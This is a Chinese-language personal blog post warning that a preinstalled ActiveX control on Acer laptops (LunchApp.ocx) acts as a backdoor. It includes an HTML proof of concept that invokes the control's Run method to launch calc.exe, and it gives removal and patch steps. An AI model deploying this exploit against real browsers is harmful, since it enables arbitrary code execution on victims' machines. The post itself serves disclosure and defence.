acer notebook 出廠附贈後門一隻@@ @ Sylphid的隨意鳥地方

有acer notebook的朋友福氣啦～原廠附贈後門一隻
檢查硬碟裡有C:\windows\system\LunchApp.ocx的話，就恭喜囉..

POC: 把下面內容存成.htm，用ie打開(要enable activex)會跑計算機起來就再次恭喜...



<html>

<body>

<object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3AA" id="hahaha">

</object>

<script>

hahaha.Run("c", "\\windows\\system32\\calc.exe", "");

</script>

</html>

</body>

解決方法: 1.把C:\windows\system\LunchApp.ocx刪除或改名
2.還相信原廠patch的話 ftp://ftp.support.acer-euro.com/utilities/LaunchAppFix/AcerLAppFix.zip

延伸閱讀:
About Acer Notebook LunchApp.APlunch ActiveX Control....
天阿.. 2006.11.19就有人發佈囉..
Dangerous backdoor in Acer laptops [Update]
Acer 'preloads vulns' onto notebooks

sylphidsu

Sylphid的隨意鳥地方

sylphidsu 發表在痞客邦留言(0) 人氣()

E-mail轉寄

«	四月 2024					»
日	一	二	三	四	五	六
	1	2	3	4	5	6
7	8	9	10	11	12	13
14	15	16	17	18	19	20
21	22	23	24	25	26	27
28	29	30

Sylphid的隨意鳥地方

acer notebook 出廠附贈後門一隻@@

留言列表

月曆

近期文章

最新迴響

文章彙整

文章分類

我的連結

參觀人氣

新聞交換

«	四月 2024					»
日	一	二	三	四	五	六
	1	2	3	4	5	6
7	8	9	10	11	12	13
14	15	16	17	18	19	20
21	22	23	24	25	26	27
28	29	30

«	四月 2024					»
日	一	二	三	四	五	六
	1	2	3	4	5	6
7	8	9	10	11	12	13
14	15	16	17	18	19	20
21	22	23	24	25	26	27
28	29	30

«	四月 2024					»
日	一	二	三	四	五	六
	1	2	3	4	5	6
7	8	9	10	11	12	13
14	15	16	17	18	19	20
21	22	23	24	25	26	27
28	29	30